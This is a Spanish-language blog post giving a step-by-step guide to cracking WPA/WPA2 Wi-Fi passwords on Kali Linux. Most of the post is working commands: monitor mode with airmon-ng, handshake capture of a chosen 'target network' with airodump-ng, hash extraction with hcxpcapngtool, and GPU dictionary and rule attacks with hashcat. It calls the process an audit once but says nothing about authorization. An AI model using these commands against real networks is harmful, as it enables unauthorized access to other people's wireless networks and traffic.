h1

Como hackear clave wifi WPA WPA2 en Linux

10/04/2024

Utilizando la distribución Kali Linux (recomendado instalarla en un pendrive y posteriormente actualizarla mediante apt update; apt upgrade; apt dist-upgrade; reboot), y una tarjeta wifi que soporte modo monitor, se puede en determinados casos descifrar la clave de redes wifi.

Para realizar la auditoría, se puede proceder con los siguientes pasos:

  1. Habilitar la tarjeta en modo monitor, y parar todos los gestores de conexiones wifi del equipo (que harían interferencia en airodump-ng buscando en otros canales distintos al seleccionado:

airmon-ng check kill
airmon-ng start wlan1

2. Buscar una red objetivo, y comenzar a grabarla

airodump-ng wlan1
airodump-ng -c 1 -w salida.pcapng --output-format pcapng  wlan1 

Sirviendo «-c 1» para escuchar el tráfico solo del canal donde el AP emite, y especificando con «–output-format» que las capturas se guarden en formato pcapng

3. Extraer los handshakes de las redes y los diccionarios básicos

hcxpcapngtool -o hashes/hashes_Todos.txt -E diccionarioNuevo.txt salida.pcapng

Si hay problemas para leerlo, utilizar editcap:

 editcap -F pcap input.cap salida_convertida.pcap

4. Instalar hashcat (recomendable la última versión estable) y comprobar que puede correr con la tarjeta gráfica (habitualmente 10 veces mayor rendimiento que ejecutándolo con la CPU).

/.hashcat -I :
Backend Device ID #1 (Alias: #2)
  Name………..: AMD Radeon RX 7800 XT
  significa que tengo q invocar «hashcat -d 2 [opciones adicionales]»

5. Ejecutar hashcat para intentar obtener la clave por diccionario con el que se generó en la etapa anterior mediante hashcat (que conviene actualizar antes):

hashcat -d 2 -m 22000 --session miSesionHashcat --outfile /home/kali/capturas/hashcat/hashcat.resultados.txt hashes/hashes_Todos.txt --status-timer=300 diccionarioNuevo.txt 


Y si no hay resultado, utilizar otro diccionario (como RockYou o mezcla de varios) para realizar un ataque más universal:

hashcat -d 2 -m 22000 --session miSesionHashcat --outfile /home/kali/capturas/hashcat/hashcat.resultados.txt hashes/hashes_Todos.txt --status-timer=300 /media/kali/B6BA8791BA874CB5/Users/cgaci/Downloads/diccionario_wpa/fich3_sin_dups.txt

De este modo hará el ataque de hash tipo «22000» (WPA2), guardará cada 300 segundos los avances del ataque, comprobará todos los handshakes almacenados en hashes_Todos.txt, guardará los resultados en hashcat_resultados.txt y utilizará el diccionario «fich3_sin_dups.txt». Como es un proceso que tarda horas o días, se puede parar y retomar con el siguiente comando:

hashcat --session miSesionHashcat --restore

En caso de que el diccionario sea insulficiente, también se pueden aplicar reglas para cambiar las palabras del diccionario en el aire. Por ejemplo, para que ponga en mayúsculas la primera letra de cada palabra de un diccionario:

hashcat -r rules/best64.rule -a 0 hash.txt diccionario.txt

Deja un comentario

Este sitio utiliza Akismet para reducir el spam. Conoce cómo se procesan los datos de tus comentarios.